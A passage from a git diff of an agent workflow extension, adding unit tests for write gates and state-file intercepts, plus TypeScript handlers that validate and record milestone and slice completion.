   const result = shouldBlockContextWrite(
     'write',
     '.gsd/milestones/M001/M001-CONTEXT.md',
     null,   // no milestoneId in queue mode
-    true,   // depth-verified
     true,   // queue phase active
   );
   assert.strictEqual(result.block, false, 'should not block in queue mode after depth verification');
+  clearDiscussionFlowState();
 });
 
-// ─── Scenario 10: markDepthVerified works in queue-only mode (no milestoneId) ──
-// This is the core regression for #1812: in queue mode, the tool_result handler
-// must call markDepthVerified() even when getDiscussionMilestoneId() is null.
+// ─── Scenario 10: depth verification is scoped per milestone, not global ──
 
-test('write-gate: markDepthVerified unblocks queue-mode writes when milestoneId is null', () => {
+test('write-gate: markDepthVerified unlocks only the matching milestone', () => {
   clearDiscussionFlowState();
-  setQueuePhaseActive(true);
+  markDepthVerified('M001');
 
-  // Before marking: should block
-  const blocked = shouldBlockContextWrite(
-    'write',
-    '.gsd/milestones/M001/M001-CONTEXT.md',
-    null,
-    isDepthVerified(),
-    isQueuePhaseActive(),
-  );
-  assert.strictEqual(blocked.block, true, 'should block before markDepthVerified');
-
-  // Simulate what the fixed tool_result handler does
-  markDepthVerified();
-
-  // After marking: should pass
   const allowed = shouldBlockContextWrite(
     'write',
     '.gsd/milestones/M001/M001-CONTEXT.md',
     null,
-    isDepthVerified(),
-    isQueuePhaseActive(),
   );
-  assert.strictEqual(allowed.block, false, 'should allow after markDepthVerified in queue mode');
+  assert.strictEqual(allowed.block, false, 'should allow the verified milestone');
+
+  const blockedOther = shouldBlockContextWrite(
+    'write',
+    '.gsd/milestones/M002/M002-CONTEXT.md',
+    null,
+  );
+  assert.strictEqual(blockedOther.block, true, 'other milestones should remain blocked');
+  assert.strictEqual(isMilestoneDepthVerified('M001'), true);
+  assert.strictEqual(isMilestoneDepthVerified('M002'), false);
 
   clearDiscussionFlowState();
 });
+
+// ─── Scenario 11: gsd_summary_save CONTEXT contract is milestone-scoped ──
+
+test('write-gate: gsd_summary_save only blocks final milestone CONTEXT writes', () => {
+  clearDiscussionFlowState();
+
+  assert.strictEqual(
+    shouldBlockContextArtifactSave('CONTEXT-DRAFT', 'M001').block,
+    false,
+    'draft CONTEXT should be allowed',
+  );
+  assert.strictEqual(
+    shouldBlockContextArtifactSave('CONTEXT', 'M001', 'S01').block,
+    false,
+    'slice CONTEXT should be allowed',
+  );
+  assert.strictEqual(
+    shouldBlockContextArtifactSave('CONTEXT', 'M001').block,
+    true,
+    'final milestone CONTEXT should block before verification',
+  );
+
+  markDepthVerified('M001');
+  assert.strictEqual(
+    shouldBlockContextArtifactSave('CONTEXT', 'M001').block,
+    false,
+    'final milestone CONTEXT should pass after verification',
+  );
+
+  clearDiscussionFlowState();
+});
+
+// ═══════════════════════════════════════════════════════════════════════
+// Discussion gate enforcement tests (pending gate mechanism)
+// ═══════════════════════════════════════════════════════════════════════
+
+import {
+  isGateQuestionId,
+  shouldBlockPendingGate,
+  shouldBlockPendingGateBash,
+  setPendingGate,
+  clearPendingGate,
+  getPendingGate,
+} from '../bootstrap/write-gate.ts';
+
+// ─── Scenario 19: isGateQuestionId recognizes all gate patterns ──
+
+test('write-gate: isGateQuestionId recognizes all gate patterns', () => {
+  assert.strictEqual(isGateQuestionId('layer1_scope_gate'), true);
+  assert.strictEqual(isGateQuestionId('layer2_architecture_gate'), true);
+  assert.strictEqual(isGateQuestionId('layer3_error_gate'), true);
+  assert.strictEqual(isGateQuestionId('layer4_quality_gate'), true);
+  assert.strictEqual(isGateQuestionId('depth_verification'), true);
+  assert.strictEqual(isGateQuestionId('depth_verification_M002'), true);
+  assert.strictEqual(isGateQuestionId('my_layer1_scope_gate_question'), true);
+  // Non-gate question IDs
+  assert.strictEqual(isGateQuestionId('project_intent'), false);
+  assert.strictEqual(isGateQuestionId('feature_priority'), false);
+  assert.strictEqual(isGateQuestionId(''), false);
+});
+
+// ─── Scenario 20: setPendingGate / getPendingGate / clearPendingGate lifecycle ──
+
+test('write-gate: pending gate lifecycle (set, get, clear)', () => {
+  clearDiscussionFlowState();
+  assert.strictEqual(getPendingGate(), null, 'starts null');
+
+  setPendingGate('layer1_scope_gate');
+  assert.strictEqual(getPendingGate(), 'layer1_scope_gate', 'set correctly');
+
+  clearPendingGate();
+  assert.strictEqual(getPendingGate(), null, 'cleared correctly');
+
+  // clearDiscussionFlowState also clears pending gate
+  setPendingGate('layer2_architecture_gate');
+  clearDiscussionFlowState();
+  assert.strictEqual(getPendingGate(), null, 'clearDiscussionFlowState clears pending gate');
+});
+
+// ─── Scenario 21: shouldBlockPendingGate blocks non-safe tools when gate is pending ──
+
+test('write-gate: shouldBlockPendingGate blocks write/edit during pending gate', () => {
+  clearDiscussionFlowState();
+  setPendingGate('layer1_scope_gate');
+
+  // write should be blocked during discussion
+  const writeResult = shouldBlockPendingGate('write', 'M001', false);
+  assert.strictEqual(writeResult.block, true, 'write should be blocked');
+  assert.ok(writeResult.reason!.includes('layer1_scope_gate'), 'reason mentions the gate');
+
+  // edit should be blocked
+  const editResult = shouldBlockPendingGate('edit', 'M001', false);
+  assert.strictEqual(editResult.block, true, 'edit should be blocked');
+
+  // gsd tools should be blocked
+  const gsdResult = shouldBlockPendingGate('gsd_plan_milestone', 'M001', false);
+  assert.strictEqual(gsdResult.block, true, 'gsd tools should be blocked');
+
+  clearDiscussionFlowState();
+});
+
+// ─── Scenario 22: shouldBlockPendingGate allows safe tools when gate is pending ──
+
+test('write-gate: shouldBlockPendingGate allows read-only and ask_user_questions during pending gate', () => {
+  clearDiscussionFlowState();
+  setPendingGate('layer1_scope_gate');
+
+  // ask_user_questions is always safe (model needs to re-ask)
+  assert.strictEqual(shouldBlockPendingGate('ask_user_questions', 'M001').block, false);
+  // read-only tools are safe
+  assert.strictEqual(shouldBlockPendingGate('read', 'M001').block, false);
+  assert.strictEqual(shouldBlockPendingGate('grep', 'M001').block, false);
+  assert.strictEqual(shouldBlockPendingGate('glob', 'M001').block, false);
+  assert.strictEqual(shouldBlockPendingGate('ls', 'M001').block, false);
+
+  clearDiscussionFlowState();
+});
+
+// ─── Scenario 23: shouldBlockPendingGate still blocks when the session is ambiguous ──
+
+test('write-gate: shouldBlockPendingGate blocks outside discussion when a gate is pending', () => {
+  clearDiscussionFlowState();
+  setPendingGate('layer1_scope_gate');
+
+  // No milestoneId and no queue phase — still block because the gate is pending
+  const result = shouldBlockPendingGate('write', null, false);
+  assert.strictEqual(result.block, true, 'should block even when milestoneId is null');
+
+  clearDiscussionFlowState();
+});
+
+// ─── Scenario 24: shouldBlockPendingGate blocks in queue mode ──
+
+test('write-gate: shouldBlockPendingGate blocks in queue mode when gate is pending', () => {
+  clearDiscussionFlowState();
+  setQueuePhaseActive(true);
+  setPendingGate('depth_verification');
+
+  const result = shouldBlockPendingGate('write', null, true);
+  assert.strictEqual(result.block, true, 'should block in queue mode');
+
+  clearDiscussionFlowState();
+});
+
+// ─── Scenario 25: shouldBlockPendingGateBash allows read-only commands ──
+
+test('write-gate: shouldBlockPendingGateBash allows read-only commands during pending gate', () => {
+  clearDiscussionFlowState();
+  setPendingGate('layer2_architecture_gate');
+
+  assert.strictEqual(shouldBlockPendingGateBash('cat file.txt', 'M001').block, false);
+  assert.strictEqual(shouldBlockPendingGateBash('git log --oneline', 'M001').block, false);
+  assert.strictEqual(shouldBlockPendingGateBash('grep -r pattern .', 'M001').block, false);
+  assert.strictEqual(shouldBlockPendingGateBash('ls -la', 'M001').block, false);
+
+  clearDiscussionFlowState();
+});
+
+// ─── Scenario 26: shouldBlockPendingGateBash blocks mutating commands ──
+
+test('write-gate: shouldBlockPendingGateBash blocks mutating commands during pending gate', () => {
+  clearDiscussionFlowState();
+  setPendingGate('layer2_architecture_gate');
+
+  const result = shouldBlockPendingGateBash('npm run build', 'M001');
+  assert.strictEqual(result.block, true, 'mutating bash should be blocked');
+  assert.ok(result.reason!.includes('layer2_architecture_gate'));
+
+  clearDiscussionFlowState();
+});
+
+// ─── Scenario 27: no pending gate means no blocking ──
+
+test('write-gate: no pending gate means no blocking', () => {
+  clearDiscussionFlowState();
+
+  assert.strictEqual(shouldBlockPendingGate('write', 'M001').block, false);
+  assert.strictEqual(shouldBlockPendingGateBash('npm run build', 'M001').block, false);
+});
+
+// ─── Scenario 28: resetWriteGateState clears pending gate ──
+
+test('write-gate: resetWriteGateState clears pending gate', () => {
+  setPendingGate('layer3_error_gate');
+  resetWriteGateState();
+  assert.strictEqual(getPendingGate(), null);
+});
+
+// ─── Standard options fixture used across depth confirmation tests ──
+
+const STANDARD_OPTIONS = [
+  { label: 'Yes, you got it (Recommended)' },
+  { label: 'Not quite — let me clarify' },
+];
+
+// ─── Scenario 11: accepts first option (confirmation) with structural validation ──
+
+test('write-gate: isDepthConfirmationAnswer accepts first option with options present', () => {
+  assert.strictEqual(
+    isDepthConfirmationAnswer('Yes, you got it (Recommended)', STANDARD_OPTIONS),
+    true,
+    'should accept exact match of first option label',
+  );
+});
+
+// ─── Scenario 12: rejects second option (decline) ──
+
+test('write-gate: isDepthConfirmationAnswer rejects decline option', () => {
+  assert.strictEqual(
+    isDepthConfirmationAnswer('Not quite — let me clarify', STANDARD_OPTIONS),
+    false,
+    'should reject the clarification option',
+  );
+});
+
+// ─── Scenario 13: rejects "None of the above" ──
+
+test('write-gate: isDepthConfirmationAnswer rejects None of the above', () => {
+  assert.strictEqual(
+    isDepthConfirmationAnswer('None of the above', STANDARD_OPTIONS),
+    false,
+    'should reject None of the above',
+  );
+});
+
+// ─── Scenario 14: rejects garbage/empty input ──
+
+test('write-gate: isDepthConfirmationAnswer rejects garbage and edge cases', () => {
+  assert.strictEqual(isDepthConfirmationAnswer('discord', STANDARD_OPTIONS), false, 'garbage string');
+  assert.strictEqual(isDepthConfirmationAnswer('', STANDARD_OPTIONS), false, 'empty string');
+  assert.strictEqual(isDepthConfirmationAnswer(undefined, STANDARD_OPTIONS), false, 'undefined');
+  assert.strictEqual(isDepthConfirmationAnswer(null, STANDARD_OPTIONS), false, 'null');
+  assert.strictEqual(isDepthConfirmationAnswer(42, STANDARD_OPTIONS), false, 'number');
+});
+
+// ─── Scenario 15: handles array-wrapped selection ──
+
+test('write-gate: isDepthConfirmationAnswer handles array-wrapped selected value', () => {
+  assert.strictEqual(
+    isDepthConfirmationAnswer(['Yes, you got it (Recommended)'], STANDARD_OPTIONS),
+    true,
+    'should accept array-wrapped confirmation',
+  );
+  assert.strictEqual(
+    isDepthConfirmationAnswer(['Not quite — let me clarify'], STANDARD_OPTIONS),
+    false,
+    'should reject array-wrapped decline',
+  );
+  assert.strictEqual(
+    isDepthConfirmationAnswer([], STANDARD_OPTIONS),
+    false,
+    'should reject empty array',
+  );
+});
+
+// ─── Scenario 16: rejects free-form "Other" text that contains "(Recommended)" ──
+
+test('write-gate: isDepthConfirmationAnswer rejects free-form text containing Recommended', () => {
+  assert.strictEqual(
+    isDepthConfirmationAnswer('I think this is fine (Recommended)', STANDARD_OPTIONS),
+    false,
+    'free-form text with (Recommended) substring must not unlock gate',
+  );
+  assert.strictEqual(
+    isDepthConfirmationAnswer('(Recommended)', STANDARD_OPTIONS),
+    false,
+    'bare (Recommended) string must not unlock gate',
+  );
+});
+
+// ─── Scenario 17: works with changed label text (decoupled from specific copy) ──
+
+test('write-gate: isDepthConfirmationAnswer works with different label text', () => {
+  const customOptions = [
+    { label: 'Looks good, proceed' },
+    { label: 'Needs more discussion' },
+  ];
+  assert.strictEqual(
+    isDepthConfirmationAnswer('Looks good, proceed', customOptions),
+    true,
+    'should accept first option regardless of label text',
+  );
+  assert.strictEqual(
+    isDepthConfirmationAnswer('Needs more discussion', customOptions),
+    false,
+    'should reject second option',
+  );
+  // Old label should NOT work with new options
+  assert.strictEqual(
+    isDepthConfirmationAnswer('Yes, you got it (Recommended)', customOptions),
+    false,
+    'old label text should not match new options',
+  );
+});
+
+// ─── Scenario 18: fallback when options not available ──
+
+test('write-gate: isDepthConfirmationAnswer falls back to (Recommended) match without options', () => {
+  assert.strictEqual(
+    isDepthConfirmationAnswer('Yes, you got it (Recommended)'),
+    true,
+    'should accept via fallback when no options provided',
+  );
+  assert.strictEqual(
+    isDepthConfirmationAnswer('Not quite — let me clarify'),
+    false,
+    'should reject non-Recommended via fallback',
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/write-intercept.test.ts b/src/resources/extensions/gsd/tests/write-intercept.test.ts
new file mode 100644
index 000000000..3e2147552
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/write-intercept.test.ts
@@ -0,0 +1,76 @@
+// GSD Extension — write-intercept unit tests
+// Tests isBlockedStateFile() and BLOCKED_WRITE_ERROR constant.
+
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import { isBlockedStateFile, BLOCKED_WRITE_ERROR } from '../write-intercept.ts';
+
+// ─── isBlockedStateFile: blocked paths ───────────────────────────────────
+
+test('write-intercept: blocks unix .gsd/STATE.md path', () => {
+  assert.strictEqual(isBlockedStateFile('/project/.gsd/STATE.md'), true);
+});
+
+test('write-intercept: blocks relative path with dir prefix before .gsd/STATE.md', () => {
+  assert.strictEqual(isBlockedStateFile('project/.gsd/STATE.md'), true);
+});
+
+test('write-intercept: blocks bare relative .gsd/STATE.md (no leading separator)', () => {
+  // (^|[/\\]) matches paths that start with .gsd/ — covers the case where write
+  // tools receive a bare relative path before the file exists (realpathSync fails).
+  assert.strictEqual(isBlockedStateFile('.gsd/STATE.md'), true);
+});
+
+test('write-intercept: blocks nested project .gsd/STATE.md path', () => {
+  assert.strictEqual(isBlockedStateFile('/Users/dev/my-project/.gsd/STATE.md'), true);
+});
+
+test('write-intercept: blocks .gsd/projects/<name>/STATE.md (symlinked projects path)', () => {
+  assert.strictEqual(isBlockedStateFile('/home/user/.gsd/projects/my-project/STATE.md'), true);
+});
+
+// ─── isBlockedStateFile: allowed paths ───────────────────────────────────
+
+test('write-intercept: allows .gsd/ROADMAP.md', () => {
+  assert.strictEqual(isBlockedStateFile('/project/.gsd/ROADMAP.md'), false);
+});
+
+test('write-intercept: allows .gsd/PLAN.md', () => {
+  assert.strictEqual(isBlockedStateFile('/project/.gsd/PLAN.md'), false);
+});
+
+test('write-intercept: allows .gsd/REQUIREMENTS.md', () => {
+  assert.strictEqual(isBlockedStateFile('/project/.gsd/REQUIREMENTS.md'), false);
+});
+
+test('write-intercept: allows .gsd/SUMMARY.md', () => {
+  assert.strictEqual(isBlockedStateFile('/project/.gsd/SUMMARY.md'), false);
+});
+
+test('write-intercept: allows .gsd/PROJECT.md', () => {
+  assert.strictEqual(isBlockedStateFile('/project/.gsd/PROJECT.md'), false);
+});
+
+test('write-intercept: allows regular source files', () => {
+  assert.strictEqual(isBlockedStateFile('/project/src/index.ts'), false);
+});
+
+test('write-intercept: allows slice plan files', () => {
+  assert.strictEqual(isBlockedStateFile('/project/.gsd/milestones/M001/slices/S01/S01-PLAN.md'), false);
+});
+
+test('write-intercept: does not block files named STATE.md outside .gsd/', () => {
+  assert.strictEqual(isBlockedStateFile('/project/docs/STATE.md'), false);
+});
+
+// ─── BLOCKED_WRITE_ERROR: content ────────────────────────────────────────
+
+test('write-intercept: BLOCKED_WRITE_ERROR is a non-empty string', () => {
+  assert.strictEqual(typeof BLOCKED_WRITE_ERROR, 'string');
+  assert.ok(BLOCKED_WRITE_ERROR.length > 0);
+});
+
+test('write-intercept: BLOCKED_WRITE_ERROR mentions engine tool calls', () => {
+  assert.ok(BLOCKED_WRITE_ERROR.includes('gsd_complete_task'), 'should mention gsd_complete_task');
+  assert.ok(BLOCKED_WRITE_ERROR.includes('engine tool calls'), 'should mention engine tool calls');
+});
diff --git a/src/resources/extensions/gsd/tests/zero-slice-roadmap-guided.test.ts b/src/resources/extensions/gsd/tests/zero-slice-roadmap-guided.test.ts
new file mode 100644
index 000000000..f41b8bd51
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/zero-slice-roadmap-guided.test.ts
@@ -0,0 +1,19 @@
+/**
+ * Regression test for #3441: guided flow must treat a roadmap with zero
+ * parseable slices the same as no roadmap — offer "Create roadmap" not "Go auto".
+ */
+import { test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+test("guided-flow checks roadmap slice count before offering auto (#3441)", () => {
+  const src = readFileSync(
+    join(import.meta.dirname, "..", "guided-flow.ts"),
+    "utf-8",
+  );
+  assert.ok(
+    src.includes("roadmapHasSlices") || src.includes("parseRoadmapSlices"),
+    "Guided flow must parse roadmap for slices before deciding which options to show",
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/zombie-gsd-state.test.ts b/src/resources/extensions/gsd/tests/zombie-gsd-state.test.ts
new file mode 100644
index 000000000..d18a7fcf8
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/zombie-gsd-state.test.ts
@@ -0,0 +1,95 @@
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertTrue, assertMatch, assertNoMatch, report } = createTestContext();
+
+// ─── #2942: Zombie .gsd state skips init wizard ─────────────────────────────
+//
+// A partially initialized .gsd/ (symlink exists but no PREFERENCES.md or
+// milestones/) causes the init wizard gate in showSmartEntry to be skipped,
+// resulting in an uninitialized project session.
+
+console.log("\n=== #2942: zombie .gsd state must not skip init wizard ===");
+
+// ── guided-flow.ts — init wizard gate must check bootstrap completeness ──
+
+const guidedFlowSrc = readFileSync(
+  join(import.meta.dirname, "..", "guided-flow.ts"),
+  "utf-8",
+);
+
+// Find the showSmartEntry function
+const smartEntryIdx = guidedFlowSrc.indexOf("export async function showSmartEntry(");
+assertTrue(smartEntryIdx >= 0, "guided-flow.ts defines showSmartEntry");
+
+// Extract the region between showSmartEntry and the first showProjectInit call
+// This is where the init wizard gate lives.
+const afterSmartEntry = smartEntryIdx >= 0 ? guidedFlowSrc.slice(smartEntryIdx, smartEntryIdx + 3000) : "";
+
+// The gate must NOT be a bare `!existsSync(gsdRoot(basePath))` check.
+// It must also verify that bootstrap artifacts (PREFERENCES.md or milestones/) exist.
+assertTrue(
+  afterSmartEntry.includes("PREFERENCES.md") || afterSmartEntry.includes("PREFERENCES"),
+  "init wizard gate checks for PREFERENCES.md, not just .gsd/ existence (#2942)",
+);
+
+assertTrue(
+  afterSmartEntry.includes("milestones"),
+  "init wizard gate checks for milestones/ directory, not just .gsd/ existence (#2942)",
+);
+
+// The init wizard should be shown when .gsd/ exists but has no bootstrap artifacts.
+// The old code was: if (!existsSync(gsdRoot(basePath))) { ... showProjectInit ... }
+// The fix should use a compound check so zombie states trigger the wizard.
+// Verify we no longer have the bare existence check as the sole gate.
+
+// Find the specific init wizard gate pattern — the detection preamble block.
+const detectionPreambleIdx = afterSmartEntry.indexOf("Detection preamble");
+const detectionRegion = detectionPreambleIdx >= 0
+  ? afterSmartEntry.slice(detectionPreambleIdx, detectionPreambleIdx + 600)
+  : afterSmartEntry.slice(0, 1500);
+
+// The gate condition must reference PREFERENCES.md or milestones (bootstrap artifacts)
+assertMatch(
+  detectionRegion,
+  /PREFERENCES\.md|milestones/,
+  "detection preamble gate references bootstrap artifacts, not just directory existence (#2942)",
+);
+
+// ── auto-start.ts — milestones/ dir creation must not be dead code ──────────
+
+console.log("\n=== #2942: auto-start milestones/ bootstrap not dead code ===");
+
+const autoStartSrc = readFileSync(
+  join(import.meta.dirname, "..", "auto-start.ts"),
+  "utf-8",
+);
+
+// After ensureGsdSymlink, the code that creates milestones/ must check for
+// the milestones directory specifically (not .gsd/ which ensureGsdSymlink already created).
+const symlinkIdx = autoStartSrc.indexOf("ensureGsdSymlink(base)");
+assertTrue(symlinkIdx >= 0, "auto-start.ts calls ensureGsdSymlink(base)");
+
+const afterSymlink = symlinkIdx >= 0 ? autoStartSrc.slice(symlinkIdx, symlinkIdx + 800) : "";
+
+// The milestones bootstrap must check milestones path, not gsdDir
+// Old (dead) code: if (!existsSync(gsdDir)) { mkdirSync(join(gsdDir, "milestones"), ...) }
+// Fixed code should check: if (!existsSync(milestonesPath)) or similar
+assertTrue(
+  afterSymlink.includes("milestones") && afterSymlink.includes("mkdirSync"),
+  "auto-start.ts creates milestones/ directory after ensureGsdSymlink (#2942)",
+);
+
+// The guard for milestones/ creation should NOT be `!existsSync(gsdDir)` —
+// that's dead code since ensureGsdSymlink already created gsdDir.
+// It should check for the milestones/ dir directly.
+const mkdirRegion = afterSymlink.slice(0, afterSymlink.indexOf("mkdirSync") + 200);
+assertMatch(
+  mkdirRegion,
+  /existsSync\([^)]*milestones/,
+  "milestones bootstrap checks milestones path existence, not .gsd/ (#2942)",
+);
+
+report();
diff --git a/src/resources/extensions/gsd/tools/complete-milestone.ts b/src/resources/extensions/gsd/tools/complete-milestone.ts
new file mode 100644
index 000000000..f20bb69f5
--- /dev/null
+++ b/src/resources/extensions/gsd/tools/complete-milestone.ts
@@ -0,0 +1,250 @@
+/**
+ * complete-milestone handler — the core operation behind gsd_complete_milestone.
+ *
+ * Validates all slices are complete, updates milestone status in DB,
+ * renders MILESTONE-SUMMARY.md to disk, stores rendered markdown in DB
+ * for recovery, and invalidates caches.
+ */
+
+import { join } from "node:path";
+import { mkdirSync } from "node:fs";
+
+import {
+  transaction,
+  getMilestone,
+  getMilestoneSlices,
+  getSliceTasks,
+  updateMilestoneStatus,
+} from "../gsd-db.js";
+import { resolveMilestonePath, clearPathCache } from "../paths.js";
+import { isClosedStatus } from "../status-guards.js";
+import { saveFile, clearParseCache } from "../files.js";
+import { invalidateStateCache } from "../state.js";
+import { renderAllProjections, stripIdPrefix } from "../workflow-projections.js";
+import { writeManifest } from "../workflow-manifest.js";
+import { appendEvent } from "../workflow-events.js";
+import { logWarning, logError } from "../workflow-logger.js";
+
+export interface CompleteMilestoneParams {
+  milestoneId: string;
+  title: string;
+  oneLiner: string;
+  narrative: string;
+  verificationPassed: boolean;
+  /** @optional — defaults to "Not provided." when omitted by models with limited tool-calling */
+  successCriteriaResults?: string;
+  /** @optional — defaults to "Not provided." when omitted */
+  definitionOfDoneResults?: string;
+  /** @optional — defaults to "Not provided." when omitted */
+  requirementOutcomes?: string;
+  /** @optional — defaults to [] when omitted */
+  keyDecisions?: string[];
+  /** @optional — defaults to [] when omitted */
+  keyFiles?: string[];
+  /** @optional — defaults to [] when omitted */
+  lessonsLearned?: string[];
+  /** @optional — defaults to "None." when omitted */
+  followUps?: string;
+  /** @optional — defaults to "None." when omitted */
+  deviations?: string;
+  /** Optional caller-provided identity for audit trail */
+  actorName?: string;
+  /** Optional caller-provided reason this action was triggered */
+  triggerReason?: string;
+}
+
+export interface CompleteMilestoneResult {
+  milestoneId: string;
+  summaryPath: string;
+}
+
+function renderMilestoneSummaryMarkdown(params: CompleteMilestoneParams): string {
+  const now = new Date().toISOString();
+  const displayTitle = stripIdPrefix(params.title, params.milestoneId);
+
+  // Apply defaults for optional enrichment fields (#2771)
+  const keyDecisions = params.keyDecisions ?? [];
+  const keyFiles = params.keyFiles ?? [];
+  const lessonsLearned = params.lessonsLearned ?? [];
+
+  const keyDecisionsYaml = keyDecisions.length > 0
+    ? keyDecisions.map(d => `  - ${d}`).join("\n")
+    : "  - (none)";
+
+  const keyFilesYaml = keyFiles.length > 0
+    ? keyFiles.map(f => `  - ${f}`).join("\n")
+    : "  - (none)";
+
+  const lessonsYaml = lessonsLearned.length > 0
+    ? lessonsLearned.map(l => `  - ${l}`).join("\n")
+    : "  - (none)";
+
+  return `---
+id: ${params.milestoneId}
+title: "${displayTitle}"
+status: complete
+completed_at: ${now}
+key_decisions:
+${keyDecisionsYaml}
+key_files:
+${keyFilesYaml}
+lessons_learned:
+${lessonsYaml}
+---
+
+# ${params.milestoneId}: ${displayTitle}
+
+**${params.oneLiner}**
+
+## What Happened
+
+${params.narrative}
+
+## Success Criteria Results
+
+${params.successCriteriaResults ?? "Not provided."}
+
+## Definition of Done Results
+
+${params.definitionOfDoneResults ?? "Not provided."}
+
+## Requirement Outcomes
+
+${params.requirementOutcomes ?? "Not provided."}
+
+## Deviations
+
+${params.deviations || "None."}
+
+## Follow-ups
+
+${params.followUps || "None."}
+`;
+}
+
+export async function handleCompleteMilestone(
+  params: CompleteMilestoneParams,
+  basePath: string,
+): Promise<CompleteMilestoneResult | { error: string }> {
+  // ── Validate required fields ────────────────────────────────────────────
+  if (!params.milestoneId || typeof params.milestoneId !== "string" || params.milestoneId.trim() === "") {
+    return { error: "milestoneId is required and must be a non-empty string" };
+  }
+  if (!params.title || typeof params.title !== "string" || params.title.trim() === "") {
+    return { error: "title is required and must be a non-empty string" };
+  }
+
+  // ── Verify that verification passed ─────────────────────────────────────
+  if (params.verificationPassed !== true) {
+    return { error: "verification did not pass — milestone completion blocked. verificationPassed must be explicitly set to true after all verification steps succeed" };
+  }
+
+  // ── Guards + DB writes inside a single transaction (prevents TOCTOU) ───
+  const completedAt = new Date().toISOString();
+  let guardError: string | null = null;
+
+  transaction(() => {
+    // State machine preconditions (inside txn for atomicity)
+    const milestone = getMilestone(params.milestoneId);
+    if (!milestone) {
+      guardError = `milestone not found: ${params.milestoneId}`;
+      return;
+    }
+    if (isClosedStatus(milestone.status)) {
+      guardError = `milestone ${params.milestoneId} is already complete`;
+      return;
+    }
+
+    // Verify all slices are complete
+    const slices = getMilestoneSlices(params.milestoneId);
+    if (slices.length === 0) {
+      guardError = `no slices found for milestone ${params.milestoneId}`;
+      return;
+    }
+
+    const incompleteSlices = slices.filter(s => !isClosedStatus(s.status));
+    if (incompleteSlices.length > 0) {
+      const incompleteIds = incompleteSlices.map(s => `${s.id} (status: ${s.status})`).join(", ");
+      guardError = `incomplete slices: ${incompleteIds}`;
+      return;
+    }
+
+    // Deep check: verify all tasks in all slices are complete
+    for (const slice of slices) {
+      const tasks = getSliceTasks(params.milestoneId, slice.id);
+      const incompleteTasks = tasks.filter(t => !isClosedStatus(t.status));
+      if (incompleteTasks.length > 0) {
+        const ids = incompleteTasks.map(t => `${t.id} (status: ${t.status})`).join(", ");
+        guardError = `slice ${slice.id} has incomplete tasks: ${ids}`;
+        return;
+      }
+    }
+
+    // All guards passed — perform write
+    updateMilestoneStatus(params.milestoneId, 'complete', completedAt);
+  });
+
+  if (guardError) {
+    return { error: guardError };
+  }
+
+  // ── Filesystem operations (outside transaction) ─────────────────────────
+  const summaryMd = renderMilestoneSummaryMarkdown(params);
+
+  let summaryPath: string;
+  const milestoneDir = resolveMilestonePath(basePath, params.milestoneId);
+  if (milestoneDir) {
+    summaryPath = join(milestoneDir, `${params.milestoneId}-SUMMARY.md`);
+  } else {
+    const gsdDir = join(basePath, ".gsd");
+    const manualDir = join(gsdDir, "milestones", params.milestoneId);
+    mkdirSync(manualDir, { recursive: true });
+    summaryPath = join(manualDir, `${params.milestoneId}-SUMMARY.md`);
+  }
+
+  try {
+    await saveFile(summaryPath, summaryMd);
+  } catch (renderErr) {
+    // Disk render failed — roll back DB status so state stays consistent
+    logWarning("tool", `complete_milestone — disk render failed, rolling back DB status: ${(renderErr as Error).message}`);
+    updateMilestoneStatus(params.milestoneId, 'active', null);
+    invalidateStateCache();
+    return { error: `disk render failed: ${(renderErr as Error).message}` };
+  }
+
+  // Invalidate all caches
+  invalidateStateCache();
+  clearPathCache();
+  clearParseCache();
+
+  // ── Post-mutation hook: projections, manifest, event log ───────────────
+  // Separate try/catch per step so a projection failure doesn't prevent
+  // the event log entry (critical for worktree reconciliation).
+  try {
+    await renderAllProjections(basePath, params.milestoneId);
+  } catch (projErr) {
+    logWarning("tool", `complete-milestone projection warning: ${(projErr as Error).message}`);
+  }
+  try {
+    writeManifest(basePath);
+  } catch (mfErr) {
+    logWarning("tool", `complete-milestone manifest warning: ${(mfErr as Error).message}`);
+  }
+  try {
+    appendEvent(basePath, {
+      cmd: "complete-milestone",
+      params: { milestoneId: params.milestoneId },
+      ts: new Date().toISOString(),
+      actor: "agent",
+      actor_name: params.actorName,
+      trigger_reason: params.triggerReason,
+    });
+  } catch (eventErr) {
+    logError("tool", `complete-milestone event log FAILED — completion invisible to reconciliation`, { error: (eventErr as Error).message });
+  }
+
+  return {
+    milestoneId: params.milestoneId,
+    summaryPath,
+  };
+}
diff --git a/src/resources/extensions/gsd/tools/complete-slice.ts b/src/resources/extensions/gsd/tools/complete-slice.ts
new file mode 100644
index 000000000..5863a586f
--- /dev/null
+++ b/src/resources/extensions/gsd/tools/complete-slice.ts
@@ -0,0 +1,370 @@
+/**
+ * complete-slice handler — the core operation behind gsd_slice_complete.
+ *
+ * Validates inputs, checks all tasks are complete, writes slice row to DB in
+ * a transaction, then (outside the transaction) renders SUMMARY.md + UAT.md
+ * to disk, toggles the roadmap checkbox, stores rendered markdown in DB for
+ * D004 recovery, and invalidates caches.
+ */
+
+import { join } from "node:path";
+import { mkdirSync } from "node:fs";
+
+import type { CompleteSliceParams } from "../types.js";
+import { isClosedStatus } from "../status-guards.js";
+import {
+  transaction,
+  insertMilestone,
+  insertSlice,
+  getSlice,
+  getSliceTasks,
+  getMilestone,
+  updateSliceStatus,
+  setSliceSummaryMd,
+} from "../gsd-db.js";
+import { resolveSliceFile, resolveSlicePath, clearPathCache } from "../paths.js";
+import { checkOwnership, sliceUnitKey } from "../unit-ownership.js";
+import { saveFile, clearParseCache } from "../files.js";
+import { invalidateStateCache } from "../state.js";
+import { renderRoadmapCheckboxes } from "../markdown-renderer.js";
+import { renderAllProjections } from "../workflow-projections.js";
+import { writeManifest } from "../workflow-manifest.js";
+import { appendEvent } from "../workflow-events.js";
+import { logWarning, logError } from "../workflow-logger.js";
+
+export interface CompleteSliceResult {
+  sliceId: string;
+  milestoneId: string;
+  summaryPath: string;
+  uatPath: string;
+}
+
+/**
+ * Render slice summary markdown matching the template format.
+ * YAML frontmatter uses snake_case keys for parseSummary() compatibility.
+ */
